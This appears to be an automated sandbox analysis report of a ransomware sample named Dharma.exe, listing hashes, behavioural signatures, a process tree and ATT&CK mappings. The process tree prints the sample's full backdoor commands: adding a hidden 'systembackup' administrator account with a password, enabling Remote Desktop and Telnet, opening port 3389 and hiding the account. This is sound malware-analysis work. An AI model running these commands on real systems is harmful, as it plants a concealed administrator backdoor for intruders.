Analysis
- max time kernel: 150s
- max time network: 162s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-03-2024 01:34
Behavioral tasks (sample, resource)
- behavioral1: Ransomware/$uckyLocker.exe, win7-20240221-en
- behavioral2: Ransomware/$uckyLocker.exe, win10v2004-20240226-en
- behavioral3: Ransomware/7ev3n.exe, win7-20240221-en
- behavioral4: Ransomware/7ev3n.exe, win10v2004-20240226-en
- behavioral5: Ransomware/Annabelle.exe, win7-20240220-en
- behavioral6: Ransomware/Annabelle.exe, win10v2004-20240226-en
- behavioral7: Ransomware/BadRabbit.exe, win7-20240215-en
- behavioral8: Ransomware/BadRabbit.exe, win10v2004-20240226-en
- behavioral9: Ransomware/Birele.exe, win10v2004-20240226-en
- behavioral10: Ransomware/Cerber5.exe, win7-20240221-en
- behavioral11: Ransomware/Cerber5.exe, win10v2004-20240226-en
- behavioral12: Ransomware/CoronaVirus.exe, win7-20240221-en
- behavioral13: Ransomware/CoronaVirus.exe, win10v2004-20240226-en
- behavioral14: Ransomware/CryptoLocker.exe, win7-20240221-en
- behavioral15: Ransomware/CryptoLocker.exe, win10v2004-20240226-en
- behavioral16: Ransomware/CryptoWall.exe, win7-20240220-en
- behavioral17: Ransomware/CryptoWall.exe, win10v2004-20240226-en
- behavioral18: Ransomware/DeriaLock.exe, win7-20240215-en
- behavioral19: Ransomware/DeriaLock.exe, win10v2004-20240226-en
- behavioral20: Ransomware/Dharma.exe, win7-20240221-en
- behavioral21: Ransomware/Dharma.exe, win10v2004-20240226-en
- behavioral22: Ransomware/Fantom.exe, win7-20240221-en
- behavioral23: Ransomware/Fantom.exe, win10v2004-20240226-en
- behavioral24: Ransomware/GandCrab.exe, win7-20240215-en
- behavioral25: Ransomware/GandCrab.exe, win10v2004-20240226-en
- behavioral26: Ransomware/GoldenEye/GoldenEye.exe, win7-20240221-en
- behavioral27: Ransomware/GoldenEye/GoldenEye.exe, win10v2004-20240226-en
- behavioral28: Ransomware/GoldenEye/GoldenEye.js, win7-20240221-en
- behavioral29: Ransomware/GoldenEye/GoldenEye.js, win10v2004-20240226-en
- behavioral30: Ransomware/InfinityCrypt.exe, win7-20240221-en
- behavioral31: Ransomware/InfinityCrypt.exe, win10v2004-20240226-en
- behavioral32: Ransomware/Krotten.exe, win7-20240221-en
General
- Target: Ransomware/Dharma.exe
- Size: 11.5MB
- MD5: 928e37519022745490d1af1ce6f336f7
- SHA1: b7840242393013f2c4c136ac7407e332be075702
- SHA256: 6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
- SHA512: 8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
- SSDEEP: 196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W
Malware Config
Signatures
Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Modifies Windows Firewall (2 TTPs, 1 IoCs)
- pid 1280, netsh.exe

Sets file to hidden (1 TTPs, 1 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
- pid 760, attrib.exe

Sets service image path in registry (2 TTPs, 13 IoCs)
Each entry is a "Set value (str)" written by mssql.exe:
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avlwumkczaykdcsqq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\avlwumkczaykdcsqq.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wwvepuhpkeefrznwe\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\wwvepuhpkeefrznwe.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tlibkondxlhtop\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\tlibkondxlhtop.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zynfurrumnoukfze\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zynfurrumnoukfze.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kbnzumuvlmtwwegy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\kbnzumuvlmtwwegy.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ixqbnnowognzhjlht\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\ixqbnnowognzhjlht.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ffqofwaowdrcbkq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\ffqofwaowdrcbkq.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssqlaq.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssql.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lziubkqbxpxgapfh\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\lziubkqbxpxgapfh.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zovrwlwpkpzuxyir\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zovrwlwpkpzuxyir.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\jefylodblrmhnn\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\jefylodblrmhnn.sys"
- \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\cqfscigclyjjiec\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\cqfscigclyjjiec.sys"

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up the country code configured in the registry, likely a geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (Dharma.exe)

Executes dropped EXE (4 IoCs)
- pid 4244, nc123.exe
- pid 3356, mssql.exe
- pid 4676, mssql2.exe
- pid 2272, SearchHost.exe

Enumerates connected drives (3 TTPs, 1 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
- File opened (read-only): \??\D: (SearchHost.exe)

Launches sc.exe (1 IoCs)
Sc.exe is a Windows utility to control services on the system.
- pid 4320, sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious behavior: LoadsDriver (32 IoCs)
- pid 3356, mssql.exe (32 occurrences)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Token: SeDebugPrivilege, pid 3356, mssql.exe
- Token: SeLoadDriverPrivilege, pid 3356, mssql.exe (32 occurrences)
- Token: SeDebugPrivilege, pid 4676, mssql2.exe
- pid 552, WMIC.exe, first pass (21 tokens, in order): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 552, WMIC.exe, second pass (9 tokens, in order): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege

Suspicious use of FindShellTrayWindow (1 IoCs)
- pid 2272, SearchHost.exe

Suspicious use of SendNotifyMessage (1 IoCs)
- pid 2272, SearchHost.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
- pid 3356, mssql.exe (3 occurrences)
- pid 4676, mssql2.exe (2 occurrences)
- pid 2272, SearchHost.exe (1 occurrence)

Suspicious use of WriteProcessMemory (64 IoCs)
Format: writer pid (writer process) wrote to memory of target pid (procid_target), occurrences.
- 828 (Dharma.exe) wrote to memory of 4244 (97), 3 occurrences
- 828 (Dharma.exe) wrote to memory of 3356 (100), 2 occurrences
- 828 (Dharma.exe) wrote to memory of 4676 (101), 3 occurrences
- 828 (Dharma.exe) wrote to memory of 4320 (102), 3 occurrences
- 828 (Dharma.exe) wrote to memory of 3436 (103), 3 occurrences
- 828 (Dharma.exe) wrote to memory of 2272 (106), 3 occurrences
- 4244 (nc123.exe) wrote to memory of 2100 (107), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 3508 (108), 3 occurrences
- 3508 (cmd.exe) wrote to memory of 552 (109), 3 occurrences
- 3508 (cmd.exe) wrote to memory of 4164 (110), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 1152 (112), 3 occurrences
- 1152 (net.exe) wrote to memory of 4624 (113), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 2756 (114), 3 occurrences
- 2756 (net.exe) wrote to memory of 3656 (115), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 1032 (116), 3 occurrences
- 1032 (cmd.exe) wrote to memory of 3120 (117), 3 occurrences
- 1032 (cmd.exe) wrote to memory of 1048 (118), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 4924 (119), 3 occurrences
- 4924 (net.exe) wrote to memory of 1460 (120), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 3136 (121), 3 occurrences
- 3136 (net.exe) wrote to memory of 4448 (122), 3 occurrences
- 3436 (cmd.exe) wrote to memory of 4836 (123), 2 occurrences

Views/modifies file attributes (1 TTPs, 1 IoCs)
- pid 760, attrib.exe
Processes (tree; each entry gives the image path, the command line, the PID and the signatures hit)
- C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe
  command: "C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"
  PID: 828
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
    command: "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"
    PID: 4244
    signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /c cls
      PID: 2100
  - C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
    command: "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"
    PID: 3356
    signatures: Sets service image path in registry; Executes dropped EXE; Suspicious behavior: LoadsDriver; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
  - C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
    command: "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"
    PID: 4676
    signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
  - C:\Windows\SysWOW64\cmd.exe
    command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat" "
    PID: 4320
  - C:\Windows\SysWOW64\cmd.exe
    command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat" "
    PID: 3436
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      PID: 3508
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        command: WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        PID: 552
        signatures: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\find.exe
        command: Find "="
        PID: 4164
    - C:\Windows\SysWOW64\net.exe
      command: net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      PID: 1152
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        PID: 4624
    - C:\Windows\SysWOW64\net.exe
      command: net localgroup Administrators systembackup /add
      PID: 2756
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 localgroup Administrators systembackup /add
        PID: 3656
    - C:\Windows\SysWOW64\cmd.exe
      command: C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      PID: 1032
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        command: WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        PID: 3120
      - C:\Windows\SysWOW64\find.exe
        command: Find "="
        PID: 1048
    - C:\Windows\SysWOW64\net.exe
      command: net localgroup "Remote Desktop Users" systembackup /add
      PID: 4924
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        PID: 1460
    - C:\Windows\SysWOW64\net.exe
      command: net accounts /forcelogoff:no /maxpwage:unlimited
      PID: 3136
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        PID: 4448
    - C:\Windows\SysWOW64\reg.exe
      command: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      PID: 4836
    - C:\Windows\SysWOW64\reg.exe
      command: reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      PID: 112
    - C:\Windows\SysWOW64\reg.exe
      command: reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      PID: 1220
    - C:\Windows\SysWOW64\attrib.exe
      command: attrib C:\users\systembackup +r +a +s +h
      PID: 760
      signatures: Sets file to hidden; Views/modifies file attributes
    - C:\Windows\SysWOW64\netsh.exe
      command: netsh firewall add portopening TCP 3389 "Remote Desktop"
      PID: 1280
      signatures: Modifies Windows Firewall
    - C:\Windows\SysWOW64\sc.exe
      command: sc config tlntsvr start=auto
      PID: 4320
      signatures: Launches sc.exe
    - C:\Windows\SysWOW64\net.exe
      command: net start Telnet
      PID: 1224
      - C:\Windows\SysWOW64\net1.exe
        command: C:\Windows\system32\net1 start Telnet
        PID: 1168
  - C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
    command: "C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"
    PID: 2272
    signatures: Executes dropped EXE; Enumerates connected drives; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of SetWindowsHookEx
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3740 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
  PID: 400
Network
MITRE ATT&CK Enterprise v15 (technique, count)
Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
Defense Evasion
- Hide Artifacts (2): Hidden Files and Directories (2)
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads